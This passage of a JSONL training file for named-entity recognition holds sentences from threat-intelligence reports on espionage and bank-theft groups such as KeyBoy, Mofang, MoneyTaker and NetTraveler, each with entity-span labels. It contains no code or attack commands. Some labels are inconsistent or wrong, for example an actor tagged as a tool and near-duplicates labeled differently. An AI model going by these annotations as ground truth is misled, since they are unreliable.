Administration ) .", "spans": {"ORGANIZATION: Tibetan Parliament": [[84, 102]], "ORGANIZATION: Tibetan": [[142, 149]], "ORGANIZATION: Central Tibetan 
Administration": [[190, 220]]}, "info": {"id": "dnrti_train_002213", "source": "dnrti_train"}} {"text": "The Arbor report describes the ongoing use of these four vulnerabilities in a series of espionage campaigns against not only Tibetan groups , but also others related to Hong Kong , Taiwan , and Uyghur interests .", "spans": {"ORGANIZATION: Arbor": [[4, 9]], "ORGANIZATION: Tibetan groups": [[125, 139]]}, "info": {"id": "dnrti_train_002214", "source": "dnrti_train"}} {"text": "The malware samples deployed in both of these operations are updated versions of the KeyBoy backdoor first discussed in 2013 by Rapid7 .", "spans": {"TOOL: KeyBoy backdoor": [[85, 100]], "ORGANIZATION: Rapid7": [[128, 134]]}, "info": {"id": "dnrti_train_002215", "source": "dnrti_train"}} {"text": "This behavioural tactic was previously mentioned in relation to KeyBoy in a 2013 blog post by Cisco .", "spans": {"TOOL: KeyBoy": [[64, 70]], "ORGANIZATION: Cisco": [[94, 99]]}, "info": {"id": "dnrti_train_002216", "source": "dnrti_train"}} {"text": "These versions of KeyBoy differed from the one first described by Rapid7 in several ways , many of which will be described in the sections to follow .", "spans": {"TOOL: KeyBoy": [[18, 24]], "ORGANIZATION: Rapid7": [[66, 72]]}, "info": {"id": "dnrti_train_002217", "source": "dnrti_train"}} {"text": "These samples were contained in exploit documents containing distinct lure content , one having a Tibetan nexus , the other an Indian nexus .", "spans": {}, "info": {"id": "dnrti_train_002218", "source": "dnrti_train"}} {"text": "We believe the 2013 , 2015 , and 2016 KeyBoy samples provide evidence of a development effort focused on changing components that would be used by researchers to develop detection signatures .", "spans": {"TOOL: KeyBoy samples": [[38, 52]]}, "info": {"id": "dnrti_train_002219", "source": "dnrti_train"}} {"text": "In another modification , first observed in the most recent October 11 Parliamentarian operation ( version agewkassif ) 
, the developer (s ) of KeyBoy began using a string obfuscation routine in order to hide many of the critical values referenced within the malware .", "spans": {"TOOL: KeyBoy": [[144, 150]], "TOOL: string obfuscation routine": [[165, 191]]}, "info": {"id": "dnrti_train_002220", "source": "dnrti_train"}} {"text": "Trend Micro specifically noted that the 2013 versions of KeyBoy used the same algorithm for encoding their configuration files as was observed in the Operation Tropic Trooper malware .", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "TOOL: KeyBoy": [[57, 63]]}, "info": {"id": "dnrti_train_002221", "source": "dnrti_train"}} {"text": "This sample was also found to be deployed using the CVE-2012-0158 vulnerability .", "spans": {"VULNERABILITY: CVE-2012-0158": [[52, 65]]}, "info": {"id": "dnrti_train_002222", "source": "dnrti_train"}} {"text": "The operation against the Tibetan Parliamentarians illustrates the continued use of malicious attachments in the form of documents bearing exploits .", "spans": {"ORGANIZATION: Tibetan Parliamentarians": [[26, 50]], "MALWARE: malicious attachments": [[84, 105]], "TOOL: documents bearing exploits": [[121, 147]]}, "info": {"id": "dnrti_train_002223", "source": "dnrti_train"}} {"text": "Chances are about even , though , that Mofang is a relevant threat actor to any organization that invests in Myanmar or is otherwise politically involved .", "spans": {"THREAT_ACTOR: Mofang": [[39, 45]]}, "info": {"id": "dnrti_train_002224", "source": "dnrti_train"}} {"text": "In addition to the campaign in Myanmar , Mofang has been observed to attack targets across multiple sectors ( government , military , critical infrastructure and the automotive and weapon industries ) in multiple countries .", "spans": {"THREAT_ACTOR: Mofang": [[41, 47]]}, "info": {"id": "dnrti_train_002225", "source": "dnrti_train"}} {"text": "This threat report gives insight into some of the information that Fox-IT has about a threat actor that it follows , 
called Mofang .", "spans": {"ORGANIZATION: Fox-IT": [[67, 73]], "THREAT_ACTOR: Mofang": [[124, 130]]}, "info": {"id": "dnrti_train_002226", "source": "dnrti_train"}} {"text": "The name Mofang is based on the Mandarin verb , which means to imitate .", "spans": {"THREAT_ACTOR: Mofang": [[9, 15]]}, "info": {"id": "dnrti_train_002227", "source": "dnrti_train"}} {"text": "It is highly likely that the Mofang group is a group that operates out of China and is probably government-affiliated .", "spans": {"THREAT_ACTOR: Mofang group": [[29, 41]]}, "info": {"id": "dnrti_train_002228", "source": "dnrti_train"}} {"text": "Chapter 7 explains the working of Mofang 's preferred tools : ShimRat and SimRatReporter .", "spans": {"TOOL: ShimRat": [[62, 69]], "TOOL: SimRatReporter": [[74, 88]]}, "info": {"id": "dnrti_train_002229", "source": "dnrti_train"}} {"text": "The Mofang group has been active in relation to the Kyaukphyu sez .", "spans": {"THREAT_ACTOR: Mofang group": [[4, 16]]}, "info": {"id": "dnrti_train_002230", "source": "dnrti_train"}} {"text": "KeyBoy provides basic backdoor functionality , allowing the operators to select from various capabilities used to surveil and steal information from the victim machine .", "spans": {"TOOL: KeyBoy": [[0, 6]]}, "info": {"id": "dnrti_train_002231", "source": "dnrti_train"}} {"text": "The first attack started in early July with a ShimRatReporter payload .", "spans": {"MALWARE: ShimRatReporter": [[46, 61]]}, "info": {"id": "dnrti_train_002232", "source": "dnrti_train"}} {"text": "Myanmar has been the target of Mofang 's attacks for years before the campaign related to the sez .", "spans": {"THREAT_ACTOR: Mofang": [[31, 37]]}, "info": {"id": "dnrti_train_002233", "source": "dnrti_train"}} {"text": "In late September 2015 Mofang used the website of Myanmar 's national airline hosted at www.flymna.com for an attack against an organization in Myanmar .", "spans": {"THREAT_ACTOR: Mofang": [[23, 29]]}, "info": {"id": "dnrti_train_002234", 
"source": "dnrti_train"}} {"text": "In December 2012 Mofang started a campaign against a new target , called ' seg ' for the purpose of this report .", "spans": {}, "info": {"id": "dnrti_train_002235", "source": "dnrti_train"}} {"text": "From the configuration it can be determined that the company was running F-Secure Antivirus and Mofang registered the domain to not appear suspicious .", "spans": {"TOOL: F-Secure Antivirus": [[73, 91]], "TOOL: Mofang": [[96, 102]]}, "info": {"id": "dnrti_train_002236", "source": "dnrti_train"}} {"text": "In September 2015 Mofang launched another attack .", "spans": {"THREAT_ACTOR: Mofang": [[18, 24]]}, "info": {"id": "dnrti_train_002237", "source": "dnrti_train"}} {"text": "A new version of ShimRat was built on the 7th of September , uploaded to the server and only days later used in a new campaign .", "spans": {"TOOL: ShimRat": [[17, 24]]}, "info": {"id": "dnrti_train_002238", "source": "dnrti_train"}} {"text": "MoneyTaker has primarily been targeting card processing systems , including the AWS CBR ( Russian Interbank System ) and purportedly SWIFT ( US ) .", "spans": {}, "info": {"id": "dnrti_train_002239", "source": "dnrti_train"}} {"text": "Given the wide usage of STAR in LATAM , financial institutions in LATAM could have particular exposure to a potential interest from the MoneyTaker group .", "spans": {"ORGANIZATION: financial institutions": [[40, 62]], "THREAT_ACTOR: MoneyTaker group": [[136, 152]]}, "info": {"id": "dnrti_train_002240", "source": "dnrti_train"}} {"text": "In addition to banks , the MoneyTaker group has attacked law firms and also financial software vendors .", "spans": {"THREAT_ACTOR: MoneyTaker group": [[27, 43]], "ORGANIZATION: law firms": [[57, 66]]}, "info": {"id": "dnrti_train_002241", "source": "dnrti_train"}} {"text": "Since that time , the group attacked companies in California , Utah , Oklahoma , Colorado , Illinois , Missouri , South Carolina , North Carolina , Virginia and Florida .", "spans": 
{}, "info": {"id": "dnrti_train_002242", "source": "dnrti_train"}} {"text": "The first attack in the US that Group-IB attributes to MoneyTaker was conducted in the spring of 2016 : money was stolen from the bank by gaining access to First Data 's \" STAR \" network operator portal .", "spans": {"ORGANIZATION: Group-IB": [[32, 40]]}, "info": {"id": "dnrti_train_002243", "source": "dnrti_train"}} {"text": "The first attack in the US that Group-IB attributes to this group was conducted in the spring of 2016 : money was stolen from the bank by gaining access to First Data 's \" STAR \" network operator portal .", "spans": {"ORGANIZATION: Group-IB": [[32, 40]]}, "info": {"id": "dnrti_train_002244", "source": "dnrti_train"}} {"text": "In 2017 , the number of MoneyTaker 's attacks has remained the same with 8 US banks , 1 law firm and 1 bank in Russia being targeted .", "spans": {"THREAT_ACTOR: MoneyTaker": [[24, 34]], "ORGANIZATION: law firm": [[88, 96]]}, "info": {"id": "dnrti_train_002245", "source": "dnrti_train"}} {"text": "In 2017 , the number of attacks has remained the same with 8 US banks , 1 law firm and 1 bank in Russia being targeted .", "spans": {"ORGANIZATION: law firm": [[74, 82]]}, "info": {"id": "dnrti_train_002246", "source": "dnrti_train"}} {"text": "By analyzing the attack infrastructure , Group-IB identified that MoneyTaker group continuously exfiltrates internal banking documentation to learn about bank operations in preparation for future attacks .", "spans": {"ORGANIZATION: Group-IB": [[41, 49]], "THREAT_ACTOR: MoneyTaker group": [[66, 82]]}, "info": {"id": "dnrti_train_002247", "source": "dnrti_train"}} {"text": "Group-IB reports that MoneyTaker uses both borrowed and their own self-written tools .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]]}, "info": {"id": "dnrti_train_002248", "source": "dnrti_train"}} {"text": "Group-IB has provided Europol and Interpol with detailed information about the MoneyTaker group for further investigative 
activities as part of our cooperation in fighting cybercrime .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]]}, "info": {"id": "dnrti_train_002249", "source": "dnrti_train"}} {"text": "In late September 2015 Mofang used the website of Myanmara 's national airline hosted at www.flymna.com for an attack against an organization in Myanmar .", "spans": {}, "info": {"id": "dnrti_train_002250", "source": "dnrti_train"}} {"text": "To control the full operation , MoneyTaker uses a Pentest framework Server .", "spans": {"THREAT_ACTOR: MoneyTaker": [[32, 42]], "TOOL: Pentest framework Server": [[50, 74]]}, "info": {"id": "dnrti_train_002251", "source": "dnrti_train"}} {"text": "On it , MoneyTaker install a legitimate tool for penetration testing – Metasploit .", "spans": {"THREAT_ACTOR: MoneyTaker": [[8, 18]], "TOOL: Metasploit": [[71, 81]]}, "info": {"id": "dnrti_train_002252", "source": "dnrti_train"}} {"text": "At the end of June 2015 Mofang started its campaign to gather information of a specific target in relation to the sezs : the cpg Corporation .", "spans": {"ORGANIZATION: cpg Corporation": [[125, 140]]}, "info": {"id": "dnrti_train_002253", "source": "dnrti_train"}} {"text": "MoneyTaker uses ' fileless ' malware only existing in RAM and is destroyed after reboot .", "spans": {"THREAT_ACTOR: MoneyTaker": [[0, 10]], "TOOL: fileless": [[18, 26]]}, "info": {"id": "dnrti_train_002254", "source": "dnrti_train"}} {"text": "To ensure persistence in the system MoneyTaker relies on PowerShell and VBS scripts - they are both difficult to detect by antivirus and easy to modify .", "spans": {"THREAT_ACTOR: MoneyTaker": [[36, 46]], "TOOL: PowerShell": [[57, 67]], "TOOL: VBS scripts": [[72, 83]]}, "info": {"id": "dnrti_train_002255", "source": "dnrti_train"}} {"text": "After successfully infecting one of the computers and gaining initial access to the system , the attackers perform reconnaissance of the local network in order to gain domain administrator privileges and eventually 
consolidate control over the network .", "spans": {}, "info": {"id": "dnrti_train_002256", "source": "dnrti_train"}} {"text": "MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs .", "spans": {"THREAT_ACTOR: MUSTANG PANDA": [[0, 13]], "TOOL: PowerShell scripts": [[84, 102]], "TOOL: Microsoft Office documents": [[107, 133]]}, "info": {"id": "dnrti_train_002257", "source": "dnrti_train"}} {"text": "This newly observed activity uses a series of redirections and fileless , malicious implementations of legitimate tools to gain access to the targeted systems .", "spans": {}, "info": {"id": "dnrti_train_002258", "source": "dnrti_train"}} {"text": "Unit 42 recently identified a targeted attack against an individual working for the Foreign Ministry of Uzbekistan in China .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "ORGANIZATION: Foreign Ministry": [[84, 100]]}, "info": {"id": "dnrti_train_002259", "source": "dnrti_train"}} {"text": "Since that time , MoneyTaker attacked companies in California , Utah , Oklahoma , Colorado , Illinois , Missouri , South Carolina , North Carolina , Virginia and Florida .", "spans": {"THREAT_ACTOR: MoneyTaker": [[18, 28]]}, "info": {"id": "dnrti_train_002260", "source": "dnrti_train"}} {"text": "In their Operation Tropic Trooper report , Trend Micro documented the behaviour and functionality of an espionage toolkit with several design similarities to those observed in the various components of KeyBoy .", "spans": {"ORGANIZATION: Trend Micro": [[43, 54]], "MALWARE: espionage toolkit": [[104, 121]], "TOOL: KeyBoy": [[202, 208]]}, "info": {"id": "dnrti_train_002261", "source": "dnrti_train"}} {"text": "Our analysis shows that actors attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": {"VULNERABILITY: CVE-2012-0158": [[52, 65]], "TOOL: NetTraveler Trojan": [[77, 95]]}, "info": {"id": 
"dnrti_train_002262", "source": "dnrti_train"}} {"text": "Unit 42 's analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "TOOL: NetTraveler": [[31, 42]], "VULNERABILITY: CVE-2012-0158": [[64, 77]], "TOOL: NetTraveler Trojan": [[89, 107]]}, "info": {"id": "dnrti_train_002263", "source": "dnrti_train"}} {"text": "Our analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": {"TOOL: NetTraveler": [[24, 35]], "VULNERABILITY: CVE-2012-0158": [[57, 70]], "TOOL: NetTraveler Trojan": [[82, 100]]}, "info": {"id": "dnrti_train_002264", "source": "dnrti_train"}} {"text": "In 2016 , Group-IB identified 10 attacks conducted by MoneyTaker , 6 attacks on banks in the US , 1 attack on a US service provider , 1 attack on a bank in the UK and 2 attacks on Russian banks .", "spans": {"ORGANIZATION: Group-IB": [[10, 18]], "ORGANIZATION: service provider": [[115, 131]]}, "info": {"id": "dnrti_train_002265", "source": "dnrti_train"}} {"text": "If KeyBoy is a single component of a larger espionage toolkit , the developers may have realized that this older , static-key based , configuration encoding algorithm was inadvertently providing a link between disparate components of their malware suite .", "spans": {"TOOL: KeyBoy": [[3, 9]], "TOOL: configuration encoding algorithm": [[134, 166]]}, "info": {"id": "dnrti_train_002266", "source": "dnrti_train"}} {"text": "In 2016 , Group-IB identified 10 attacks conducted by MoneyTaker ; 6 attacks on banks in the US , 1 attack on a US service provider , 1 attack on a bank in the UK and 2 attacks on Russian banks .", "spans": {"ORGANIZATION: Group-IB": [[10, 18]], "ORGANIZATION: service provider": [[115, 131]]}, "info": {"id": "dnrti_train_002267", "source": "dnrti_train"}} {"text": "The NetTraveler trojan has been known to be used in targeted cyber espionage attacks for more than a decade by nation state 
threat actors and continues to be used to target its victims and exfiltrate data .", "spans": {"TOOL: NetTraveler trojan": [[4, 22]]}, "info": {"id": "dnrti_train_002268", "source": "dnrti_train"}} {"text": "The exploit document carrying this alternate KeyBoy configuration also used a decoy document which was displayed to the user after the exploit launched .", "spans": {"MALWARE: exploit document": [[4, 20]], "TOOL: KeyBoy": [[45, 51]], "MALWARE: decoy document": [[78, 92]]}, "info": {"id": "dnrti_train_002269", "source": "dnrti_train"}} {"text": "Only one incident involving a Russian bank was promptly identified and prevented that is known to Group-IB .", "spans": {"ORGANIZATION: Group-IB": [[98, 106]]}, "info": {"id": "dnrti_train_002270", "source": "dnrti_train"}} {"text": "This program is designed to capture keystrokes , take screenshots of the user 's desktop and get contents from the clipboard .", "spans": {}, "info": {"id": "dnrti_train_002271", "source": "dnrti_train"}} {"text": "To conduct targeted attacks , MoneyTaker use a distributed infrastructure that is difficult to track .", "spans": {"THREAT_ACTOR: MoneyTaker": [[30, 40]], "TOOL: distributed infrastructure": [[47, 73]]}, "info": {"id": "dnrti_train_002272", "source": "dnrti_train"}} {"text": "This technique hides the true C2 server from researchers that do not have access to both the rastls.dll and Sycmentec.config files .", "spans": {"MALWARE: rastls.dll": [[93, 103]], "MALWARE: Sycmentec.config files": [[108, 130]]}, "info": {"id": "dnrti_train_002273", "source": "dnrti_train"}} {"text": "Hackers use Metasploit to conduct all these activities : network reconnaissance , search for vulnerable applications , exploit vulnerabilities , escalate systems privileges , and collect information .", "spans": {"TOOL: Metasploit": [[12, 22]]}, "info": {"id": "dnrti_train_002274", "source": "dnrti_train"}} {"text": "Over the years they've used application components from Norman , McAfee and Norton .", "spans": 
{"ORGANIZATION: Norman": [[56, 62]], "ORGANIZATION: McAfee": [[65, 71]], "ORGANIZATION: Norton": [[76, 82]]}, "info": {"id": "dnrti_train_002275", "source": "dnrti_train"}} {"text": "Recently , Falcon Intelligence observed new activity from MUSTANG PANDA , using a unique infection chain to target likely Mongolia-based victims .", "spans": {"ORGANIZATION: Falcon Intelligence": [[11, 30]], "TOOL: infection chain": [[89, 104]]}, "info": {"id": "dnrti_train_002276", "source": "dnrti_train"}} {"text": "Throughout the years , the Mofang group has compromised countless servers belonging to government or other Myanmar related organizations , in order to stage attacks .", "spans": {}, "info": {"id": "dnrti_train_002277", "source": "dnrti_train"}} {"text": "A report published by Kaspersky Labs in 2011 on NetTraveler also mentions the C2 servers were being hosted by Krypt Technolgies .", "spans": {"ORGANIZATION: Kaspersky Labs": [[22, 36]], "TOOL: NetTraveler": [[48, 59]]}, "info": {"id": "dnrti_train_002279", "source": "dnrti_train"}} {"text": "Obviously , the developers behind NetTraveler have taken steps to try to hide the malware 's configuration .", "spans": {"TOOL: NetTraveler": [[34, 45]]}, "info": {"id": "dnrti_train_002280", "source": "dnrti_train"}} {"text": "In this report , we'll review how the actors attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": {"VULNERABILITY: CVE-2012-0158": [[66, 79]], "TOOL: NetTraveler Trojan": [[95, 113]]}, "info": {"id": "dnrti_train_002281", "source": "dnrti_train"}} {"text": "In this report , we'll review how NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": {"TOOL: NetTraveler": [[34, 45]], "VULNERABILITY: CVE-2012-0158": [[67, 80]], "TOOL: NetTraveler Trojan": [[96, 114]]}, "info": {"id": "dnrti_train_002282", "source": "dnrti_train"}} {"text": "In this report , we'll review how the NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler 
Trojan .", "spans": {"TOOL: NetTraveler": [[38, 49]], "VULNERABILITY: CVE-2012-0158": [[71, 84]], "TOOL: NetTraveler Trojan": [[100, 118]]}, "info": {"id": "dnrti_train_002283", "source": "dnrti_train"}} {"text": "NetTraveler has been used to target diplomats , embassies and government institutions for over a decade , and remains the tool of choice by the adversaries behind these cyber espionage campaigns .", "spans": {"TOOL: NetTraveler": [[0, 11]], "ORGANIZATION: diplomats": [[36, 45]], "ORGANIZATION: embassies": [[48, 57]], "ORGANIZATION: government institutions": [[62, 85]]}, "info": {"id": "dnrti_train_002285", "source": "dnrti_train"}} {"text": "WildFire correctly classifies NetTraveler as malicious .", "spans": {"ORGANIZATION: WildFire": [[0, 8]], "TOOL: NetTraveler": [[30, 41]]}, "info": {"id": "dnrti_train_002286", "source": "dnrti_train"}} {"text": "The NetTraveler group has infected victims across multiple establishments in both the public and private sector including government institutions , embassies , the oil and gas industry , research centers , military contractors and activists .", "spans": {"ORGANIZATION: government institutions": [[122, 145]], "ORGANIZATION: embassies": [[148, 157]], "ORGANIZATION: military contractors": [[206, 226]], "ORGANIZATION: activists": [[231, 240]]}, "info": {"id": "dnrti_train_002287", "source": "dnrti_train"}} {"text": "Today Kaspersky Lab 's team of experts published a new research report about NetTraveler , which is a family of malicious programs used by APT actors to successfully compromise more than 350 high-profile victims in 40 countries .", "spans": {"ORGANIZATION: Kaspersky Lab": [[6, 19]], "TOOL: NetTraveler": [[77, 88]]}, "info": {"id": "dnrti_train_002288", "source": "dnrti_train"}} {"text": "According to Kaspersky Lab 's report , this threat actor has been active since as early as 2004 ; however , the highest volume of activity occurred from 2010 – 2013 .", "spans": {"ORGANIZATION: Kaspersky Lab": [[13, 
26]]}, "info": {"id": "dnrti_train_002289", "source": "dnrti_train"}} {"text": "Most recently , the NetTraveler group 's main domains of interest for cyberespionage activities include space exploration , nanotechnology , energy production , nuclear power , lasers , medicine and communications .", "spans": {}, "info": {"id": "dnrti_train_002290", "source": "dnrti_train"}} {"text": "In addition , the NetTraveler toolkit was able to install additional info-stealing malware as a backdoor , and it could be customized to steal other types of sensitive information such as configuration details for an application or computer-aided design files .", "spans": {"TOOL: NetTraveler toolkit": [[18, 37]]}, "info": {"id": "dnrti_train_002291", "source": "dnrti_train"}} {"text": "During Kaspersky Lab 's analysis of NetTraveler , the company 's experts identified six victims that had been infected by both NetTraveler and Red October , which was another cyberespionage operation analyzed by Kaspersky Lab in January 2013 .", "spans": {"ORGANIZATION: Kaspersky Lab": [[7, 20], [212, 225]], "TOOL: NetTraveler": [[36, 47]]}, "info": {"id": "dnrti_train_002292", "source": "dnrti_train"}} {"text": "Kaspersky Lab 's products detect and neutralize the malicious programs and its variants used by the NetTraveler Toolkit , including Trojan-Spy.Win32.TravNet and Downloader.Win32.NetTraveler .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]], "TOOL: NetTraveler Toolkit": [[100, 119]], "TOOL: Trojan-Spy.Win32.TravNet": [[132, 156]], "TOOL: Downloader.Win32.NetTraveler": [[161, 189]]}, "info": {"id": "dnrti_train_002293", "source": "dnrti_train"}} {"text": "Based on Kaspersky Lab 's analysis of NetTraveler 's C&C data , there were a total of 350 victims in 40 countries across including the United States , Canada , United Kingdom , Russia , Chile , Morocco , Greece , Belgium , Austria , Ukraine , Lithuania , Belarus , Australia , Hong Kong , Japan , China , Mongolia , Iran , Turkey , India , 
Pakistan , South Korea , Thailand , Qatar , Kazakhstan , and Jordan .", "spans": {"ORGANIZATION: Kaspersky Lab": [[9, 22]]}, "info": {"id": "dnrti_train_002294", "source": "dnrti_train"}} {"text": "In this case , it was a group commonly referred to as \" Nitro \" , which was coined by Symantec in its 2011 whitepaper .", "spans": {"ORGANIZATION: Symantec": [[86, 94]]}, "info": {"id": "dnrti_train_002296", "source": "dnrti_train"}} {"text": "Historically , Nitro is known for targeted spear phishing campaigns and using Poison Ivy malware , which was not seen in these attacks .", "spans": {"TOOL: Poison Ivy malware": [[78, 96]]}, "info": {"id": "dnrti_train_002297", "source": "dnrti_train"}} {"text": "Since at least 2013 , Nitro appears to have somewhat modified their malware and delivery methods to include Spindest and legitimate compromised websites , as reported by Cyber Squared 's TCIRT .", "spans": {"TOOL: Spindest": [[108, 116]], "TOOL: legitimate compromised websites": [[121, 152]], "ORGANIZATION: Cyber Squared 's TCIRT": [[170, 192]]}, "info": {"id": "dnrti_train_002298", "source": "dnrti_train"}} {"text": "In July , Nitro compromised a South Korean clothing and accessories manufacturer 's website to serve malware commonly referred to as \" Spindest \" .", "spans": {"TOOL: Spindest": [[135, 143]]}, "info": {"id": "dnrti_train_002299", "source": "dnrti_train"}} {"text": "Of all the samples we've tied to this activity so far noted in this blog , this is the only one configured to connect directly to an IP address for Command and Control ( C2 ) .", "spans": {}, "info": {"id": "dnrti_train_002300", "source": "dnrti_train"}} {"text": "The next sample was another Spindest variant and had the same timestamp as the aforementioned PcClient sample .", "spans": {"TOOL: Spindest": [[28, 36]], "TOOL: PcClient sample": [[94, 109]]}, "info": {"id": "dnrti_train_002301", "source": "dnrti_train"}} {"text": "As this post and previous cited research show , APT groups such as 
Nitro will continue to evolve their techniques within the kill chain to avoid detection .", "spans": {}, "info": {"id": "dnrti_train_002302", "source": "dnrti_train"}} {"text": "They then moved on to the motor industry in late May .", "spans": {}, "info": {"id": "dnrti_train_002307", "source": "dnrti_train"}} {"text": "From late April to early May , the attackers focused on human rights related NGOs .", "spans": {}, "info": {"id": "dnrti_train_002308", "source": "dnrti_train"}} {"text": "Attackers then moved on to the motor industry in late May .", "spans": {}, "info": {"id": "dnrti_train_002309", "source": "dnrti_train"}} {"text": "At this point , the current attack campaign against the chemical industry began .", "spans": {}, "info": {"id": "dnrti_train_002310", "source": "dnrti_train"}} {"text": "The attacks were traced back to a computer system that was a virtual private server ( VPS ) located in the United States .", "spans": {"TOOL: VPS": [[86, 89]]}, "info": {"id": "dnrti_train_002315", "source": "dnrti_train"}} {"text": "Nitro 's campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes .", "spans": {"THREAT_ACTOR: Nitro": [[0, 5]], "ORGANIZATION: chemical sector": [[33, 48]]}, "info": {"id": "dnrti_train_002321", "source": "dnrti_train"}} {"text": "These have been highly active in the Middle East region and unveiled ongoing targeted attacks in multiple regions .", "spans": {}, "info": {"id": "dnrti_train_002323", "source": "dnrti_train"}} {"text": "The attackers try to lure targets through spear phishing emails that include compressed executables .", "spans": {}, "info": {"id": "dnrti_train_002324", "source": "dnrti_train"}} {"text": "We found that the group behind this campaign targeted mainly industrial , engineering and manufacturing organizations in more than 30 countries .", "spans": {"ORGANIZATION: manufacturing organizations": [[90, 117]]}, "info": 
{"id": "dnrti_train_002325", "source": "dnrti_train"}} {"text": "Using the Kaspersky Security Network ( KSN ) and artifacts from malware files and attack sites , we were able to trace the attacks back to March 2015 .", "spans": {"ORGANIZATION: Kaspersky Security Network": [[10, 36]], "ORGANIZATION: KSN": [[39, 42]]}, "info": {"id": "dnrti_train_002326", "source": "dnrti_train"}} {"text": "Operation Ghoul is one of the many attacks in the wild targeting industrial , manufacturing and engineering organizations , Kaspersky Lab recommends users to be extra cautious while checking and opening emails and attachments .", "spans": {"ORGANIZATION: engineering organizations": [[96, 121]], "ORGANIZATION: Kaspersky Lab": [[124, 137]]}, "info": {"id": "dnrti_train_002327", "source": "dnrti_train"}} {"text": "The main point that sets Operation Groundbait apart from the other attacks is that it has mostly been targeting anti-government separatists in the self-declared Donetsk and Luhansk People's Republics .", "spans": {"ORGANIZATION: anti-government separatists": [[112, 139]]}, "info": {"id": "dnrti_train_002328", "source": "dnrti_train"}} {"text": "The attacks appear to be geopolitically motivated and target high profile organizations .", "spans": {"ORGANIZATION: high profile organizations": [[61, 87]]}, "info": {"id": "dnrti_train_002329", "source": "dnrti_train"}} {"text": "The objective of the attacks is clearly espionage – they involve gaining access to top legislative , executive and judicial bodies around the world .", "spans": {}, "info": {"id": "dnrti_train_002330", "source": "dnrti_train"}} {"text": "The attackers have targeted a large number of organizations globally since early 2017 , with the main focus on the Middle East and North Africa ( MENA ) , especially Palestine .", "spans": {}, "info": {"id": "dnrti_train_002331", "source": "dnrti_train"}} {"text": "The attacks were initially discovered while investigating a phishing attack that targeted political figures 
in the MENA region .", "spans": {}, "info": {"id": "dnrti_train_002332", "source": "dnrti_train"}} {"text": "Like BlackEnergy ( a.k.a Sandworm , Quedagh ) , Potao is an example of targeted espionage ( APT ) malware detected mostly in Ukraine and a number of other CIS countries , including Russia , Georgia and Belarus .", "spans": {"TOOL: BlackEnergy": [[5, 16]], "THREAT_ACTOR: Sandworm": [[25, 33]], "THREAT_ACTOR: Quedagh": [[36, 43]], "TOOL: Potao": [[48, 53]]}, "info": {"id": "dnrti_train_002333", "source": "dnrti_train"}} {"text": "The main reason for the increase in Potao detections in 2014 and 2015 were infections through USB drives .", "spans": {"TOOL: Potao": [[36, 41]]}, "info": {"id": "dnrti_train_002334", "source": "dnrti_train"}} {"text": "The first Potao campaign that we examined took place in August 2011 .", "spans": {}, "info": {"id": "dnrti_train_002335", "source": "dnrti_train"}} {"text": "In March 2014 , the gang behind Potao started using a new infection vector .", "spans": {"TOOL: Potao": [[32, 37]], "TOOL: infection vector": [[58, 74]]}, "info": {"id": "dnrti_train_002336", "source": "dnrti_train"}} {"text": "Since March 2015 , ESET has detected Potao binaries at several high-value Ukrainian targets that include government and military entities and one of the major Ukrainian news agencies .", "spans": {"ORGANIZATION: ESET": [[19, 23]], "TOOL: Potao": [[37, 42]], "ORGANIZATION: military entities": [[120, 137]], "ORGANIZATION: news agencies": [[169, 182]]}, "info": {"id": "dnrti_train_002337", "source": "dnrti_train"}} {"text": "As confirmation that the malware writers are still very active even at the time of this writing , ESET detected a new Potao sample compiled on July 20 , 2015 .", "spans": {"ORGANIZATION: ESET": [[98, 102]], "TOOL: Potao sample": [[118, 130]]}, "info": {"id": "dnrti_train_002338", "source": "dnrti_train"}} {"text": "In the previous pages we have presented our findings based on ESET detection telemetry and our analysis of 
Win32/Potao and Win32/FakeTC samples .", "spans": {"ORGANIZATION: ESET": [[62, 66]], "TOOL: Win32/Potao": [[107, 118]], "TOOL: Win32/FakeTC samples": [[123, 143]]}, "info": {"id": "dnrti_train_002339", "source": "dnrti_train"}} {"text": "Potao is another example of targeted espionage malware , a so-called APT , to use the popular buzzword , although technically the malware is not particularly advanced or sophisticated .", "spans": {"TOOL: Potao": [[0, 5]], "TOOL: malware": [[130, 137]]}, "info": {"id": "dnrti_train_002340", "source": "dnrti_train"}} {"text": "Examples of notable Potao dissemination techniques , some of which were previously unseen , or at least relatively uncommon , include the use of highly-targeted spear-phishing SMS messages to drive potential victims to malware download sites and USB worm functionality that tricked the user into ' willingly ' executing the trojan .", "spans": {"TOOL: Potao": [[20, 25]]}, "info": {"id": "dnrti_train_002341", "source": "dnrti_train"}} {"text": "The PassCV group continues to be one of the most successful and active threat groups that leverage a wide array of stolen Authenticode-signing certificates .", "spans": {"THREAT_ACTOR: PassCV group": [[4, 16]]}, "info": {"id": "dnrti_train_002342", "source": "dnrti_train"}} {"text": "The PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) .", "spans": {"THREAT_ACTOR: PassCV group": [[4, 16]], "TOOL: publicly available RATs": [[36, 59]]}, "info": {"id": "dnrti_train_002343", "source": "dnrti_train"}} {"text": "he PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) .", "spans": {"THREAT_ACTOR: PassCV": [[3, 9]], "TOOL: publicly available RATs": [[35, 58]]}, "info": {"id": 
